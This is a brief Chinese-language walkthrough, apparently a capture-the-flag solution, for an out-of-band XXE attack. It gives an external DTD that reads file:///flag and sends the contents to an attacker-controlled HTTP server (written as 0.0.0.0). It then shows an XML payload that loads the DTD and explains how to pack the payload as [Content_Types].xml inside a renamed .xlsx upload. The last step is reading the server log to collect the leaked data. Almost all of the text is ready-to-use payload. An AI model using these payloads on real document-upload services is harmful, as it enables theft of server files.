1:
vps开启服务 /在目录下放置一个xxe.dtd文件
<!ENTITY % d SYSTEM "file:///flag">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'http://0.0.0.0/%d;'>">
2:
编写一个payload
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://0.0.0.0/xxe.dtd">
%asd;
%c;
]>
<a>&rrr;<a>
命名:[Content_Types].xml
[Content_Types].xml通过压缩工具压缩成[Content_Types].zip
将[Content_Types].zip命名为xxe.xlsx
3:
4:查看log响应日志